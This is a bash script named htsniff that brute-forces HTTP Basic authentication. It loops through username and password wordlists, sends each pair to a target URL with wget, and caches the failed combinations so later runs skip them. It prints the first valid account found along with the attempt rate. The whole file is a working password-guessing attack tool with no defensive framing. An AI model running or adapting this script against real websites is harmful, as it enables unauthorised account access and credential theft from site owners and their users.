#!/bin/bash # # written by jens heine bluemelvin_at_web.de 2005 # # try to login on a http site and try different username/password # combinations. Search a valid login... # TARGET_URL="http://localhost" USERAGENT="Mozilla/4.0" USERNAME="" PASSWORD="" USERNAMEFILE="usernamefile" PASSWDFILE="passwdfile" DEBUG=0 TMPFOLDER="$HOME/.htsniff" WGETLOGFILE="$TMPFOLDER/wget.tmp" ATTEMPSCACHELOGFILE="checked_accounts.log" IGNORE_CACHE=0 helptext="\nhtsniff version 0.3 by jens heine bluemelvin_at_web.de (2005) \ \nUsage: htsniff [-t url][-a user-agent][-u usernamefile]\ [-p passwdfile][-i ignore-cache][-?]\n \ [-v[v] verbose]\n\n" while getopts "t:a:u:p:?vi" optn; do case $optn in t ) TARGET_URL="$OPTARG" ;; a ) USERAGENT="$OPTARG" ;; u ) USERNAMEFILE="$OPTARG" ;; p ) PASSWDFILE="$OPTARG" ;; v ) DEBUG=`echo "$DEBUG + 1"|bc` ;; i ) IGNORE_CACHE=1 ;; \? ) printf "$helptext" exit 1 ;; esac done # # functions # # arguements: loglevel, logtext log() { if [ $DEBUG -ge $1 ];then echo "$2" fi } cleanup() { rm -f $WGETLOGFILE >/dev/null 1>&2 } checkUrl() { URL=$1 rm -f $WGETLOGFILE log 2 "Trying to connect to url." wget -O /dev/null -U $USERAGENT -o $WGETLOGFILE $TARGET_URL if [ -s $WGETLOGFILE -a `grep -i "verbindungsaufbau abgelehnt" $WGETLOGFILE | wc -l` -gt 0 ];then echo "Can not connect to url: \"$TARGET_URL\"" cleanup exit 1 fi if [ -s $WGETLOGFILE -a `grep -i "404 not found" $WGETLOGFILE | wc -l` -gt 0 ];then echo "Server could not find url: \"$TARGET_URL\"" cleanup exit 1 fi log 2 "Checking password protection of url." if [ `grep -i "401 Authorization Required" $WGETLOGFILE | wc -l` -gt 0 ];then log 2 "Url \"$TARGET_URL\" checked. Password required to access site." else echo "Url \"$TARGET_URL\" checked. No password neccessary to access this site." exit 0 fi } # arguments: start_time in secs, total attempts printRateStatistics() { stop_time=`date +%s` elapsed_time=`echo "$stop_time - $1"|bc` rate=`echo "scale=2;$2 / $elapsed_time"|bc` echo "Rate: $rate attempts/second" } # # Main # # mkdir -p "$TMPFOLDER" mkdir -p "$TMPFOLDER/$TARGET_URL" ( [ ! -f $USERNAMEFILE ] || [ `cat $USERNAMEFILE|wc -l` -eq 0 ] ) \ && echo "Usernamefile not found or empty: $USERNAMEFILE" && exit 1 ( [ ! -f $PASSWDFILE ] || [ `cat $PASSWDFILE|wc -l` -eq 0 ] ) \ && echo "Password file not found or empty: $PASSWDFILE" && exit 1 log 1 "Checking usernamefile : `cat $USERNAMEFILE|wc -l` user(s)." log 1 "Checking passwdfile : `cat $PASSWDFILE|wc -l` passwords." log 1 "Target url : $TARGET_URL" if [ -s $TMPFOLDER/$TARGET_URL/$ATTEMPSCACHELOGFILE ];then log 1 "Failed tries : `cat $TMPFOLDER/$TARGET_URL/$ATTEMPSCACHELOGFILE|wc -l`" fi checkUrl "$TARGET_URL" attempt_counter=0 start_time=`date +%s` trap 'echo;printRateStatistics $start_time $attempt_counter;cleanup;exit 1' 2 for USERNAME in `cat $USERNAMEFILE | sort | uniq`; do for PASSWORD in `cat $USERNAMEFILE $PASSWDFILE | sort | uniq`; do if [ $IGNORE_CACHE -eq 0 ];then grep -x "$USERNAME:$PASSWORD" $TMPFOLDER/$TARGET_URL/$ATTEMPSCACHELOGFILE >/dev/null 2>&1 cache_check_result=$? if [ $cache_check_result -eq 0 ];then log 3 "Skipping combination \"$USERNAME:$PASSWORD\". This account has been checked before." echo -en "x" continue fi fi attempt_counter=`echo "$attempt_counter + 1"|bc` log 2 "$attempt_counter. Trying to login with $USERNAME:$PASSWORD" echo -en "." rm -f $WGETLOGFILE wget -O /dev/null -U $USERAGENT --http-user="$USERNAME" \ --http-passwd="$PASSWORD" -o $WGETLOGFILE $TARGET_URL attempt_result=$? log 3 "wget result: $attempt_result" if [ -s $WGETLOGFILE -a `grep -i "verbindungsaufbau abgelehnt" $WGETLOGFILE | wc -l` -gt 0 ];then echo "Can not connect to url: \"$TARGET_URL\"" printRateStatistics $start_time $attempt_counter cleanup exit 1 fi if [ -s $WGETLOGFILE -a `grep -i "404 not found" $WGETLOGFILE | wc -l` -gt 0 ];then echo "Server could not find url: \"$TARGET_URL\"" printRateStatistics $start_time $attempt_counter cleanup exit 1 fi if [ $attempt_result -eq 0 ]; then echo echo "************************************" echo "Valid account found. Access granted." echo "Account >>> $USERNAME:$PASSWORD <<<" echo "Total accounts tested: $attempt_counter" printRateStatistics $start_time $attempt_counter echo "************************************" cleanup exit 0 fi echo "$USERNAME:$PASSWORD" >> $TMPFOLDER/$TARGET_URL/$ATTEMPSCACHELOGFILE done done echo printRateStatistics $start_time $attempt_counter echo "$attempt_counter accounts checked. No match found." echo "Sorry. Try more accounts." cleanup exit 2